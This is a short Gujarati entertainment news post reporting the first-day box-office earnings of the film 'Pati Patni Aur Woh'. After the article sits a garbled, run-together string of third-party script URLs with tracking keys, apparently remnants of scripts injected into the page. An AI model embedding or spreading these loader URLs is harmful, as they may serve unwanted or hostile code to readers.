કાર્તિક અને અનન્યા ની ફિલ્મે પ્રથમ દિવસે કર્યું આટલા કરોડનો બિઝનેસ

December 7, 2019 - krishana trivedi

No Comments

કાર્તિક આર્યન, અનન્યા પાંડે અને ભૂમિ પેડનેકરની ફિલ્મ પતિ પત્ની ઓર વો રિલીઝ થઈ ચુકી છે. ફિલ્મમાં કાર્તિક ઘરવાળી અને બહરવાળી વચ્ચે અટવાયેલી જોવા મળે છે. આ ફિલ્મ 1978 માં આવેલી ફિલ્મ પતિ પત્ની ઓર વોની રિમેક છે. ફિલ્મના રિલીઝ થયા બાદ પહેલા દિવસનો બોક્સ ઓફીસ કલેક્શન બહાર આવ્યું છે. આ ફિલ્મે પહેલા દિવસે 9.10 કરોડનો બિઝનેસ કર્યો છે.

 

//cilkonlay.com/2176e1b695bb4978f2.jshttp://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566xhttp://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1575716297114http://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks%5B%5D=31af2

krishana trivedi

Leave a comment

Your email address will not be published. Required fields are marked *